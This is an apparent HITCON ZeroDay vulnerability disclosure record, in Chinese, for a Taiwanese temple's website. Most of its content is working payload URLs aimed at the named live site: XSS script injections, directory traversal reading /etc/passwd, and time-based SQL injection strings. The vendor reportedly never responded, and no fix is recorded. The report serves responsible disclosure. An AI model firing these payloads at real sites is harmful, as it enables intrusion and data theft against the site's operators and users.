Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00495
- 發信 Vendor: 新北市義天宮
- Title: 義天宮SQL injection、XSS、Directory traversal、Clickjacking
- Introduction: SQL injection、XSS、Directory traversal、Clickjacking
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/09/15 17:22:55 : 新提交 (由 CpyRe 更新此狀態)
- 2023/09/15 17:29:28 : 新提交 (由 CpyRe 更新此狀態)
- 2023/09/18 10:24:58 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/09/28 19:05:25 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/09/28 19:05:26 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/11/15 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00495
- 通報者:a30368694 (CpyRe)
- 風險:高
- 類型:其他 (Other)
參考資料
相關網址
https://www.itien.org.tw/pages/index.php
敘述
有多處包含XSS注入
以下是整理好簡短的Payload:
https://itien.org.tw/pages/?Ipg=pro&Sid=%27%3E%3Cscript%3Ealert(1)%3C/script%3E
https://itien.org.tw/pages/?Ipg=pro&tSid=%27%3E%3Cscript%3Ealert(1)%3C/script%3E
https://itien.org.tw/pages/?Ipg=pro&PorSetSoft=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&Sid=793&&id=853&show=1
https://itien.org.tw/pages/?Ipg=pro&Sid=793&id=853&isDiv=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
https://itien.org.tw/pages/?Ipg=pro&Sid=793&id=853&schkey=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
https://itien.org.tw/pages/?Ipg=pro&Sid=793&id=853&schtga=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&list_p=%27%3E%3Cscript%3Ealert(1)%3C/script%3E
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&list_p=24&tSid=%27%3E%3Cscript%3Ealert(1)%3C/script%3E
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&id=739&show=1
https://itien.org.tw/pages/index.php?Ipg=pro&PorSetSoft=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&Sid=712&id=740&show=1
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&id=740&isDiv=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&id=740&schkey=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&id=740&schtga=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E&show=1
有多處有目錄遍歷 有心人士可以利用這個點做後續的滲透入侵控制主機
Payload:
https://itien.org.tw/pages/?Ipg=../../../../../../../../../../../../../../etc/passwd
https://itien.org.tw/pages/?Ipg=pro&Sid=../../../../../../../../../../../../../../etc/passwd
https://itien.org.tw/pages/?Ipg=1019&showPg=../../../../../../../../../../../../../../etc/passwd
https://itien.org.tw/pages/index.php?Ipg=../../../../../../../../../../../../../../etc/passwd&Sid=712&list_p=24
https://itien.org.tw/pages/index.php?Ipg=1019&showPg=../../../../../../../../../../../../../../etc/passwd
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=../../../../../../../../../../../../../../etc/passwd&id=739&show=1
還有疑是有SQL injection
Payload:
https://itien.org.tw/pages/?Ipg=pro&Sid=1%20PROCEDURE%20ANALYSE(EXTRACTVALUE(9859%2CCONCAT(0x5c%2C(BENCHMARK(1%2CMD5(0x7562756f)))))%2C1)--%20
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=712&list_p=1%27%22&tSid=
https://itien.org.tw/pages/index.php?Ipg=pro&Sid=1%20PROCEDURE%20ANALYSE(EXTRACTVALUE(9859%2CCONCAT(0x5c%2C(BENCHMARK(1%2CMD5(0x7562756f)))))%2C1)--%20&list_p=0&tSid=
可以被嵌入進code導致有心人士可以實行詐騙之用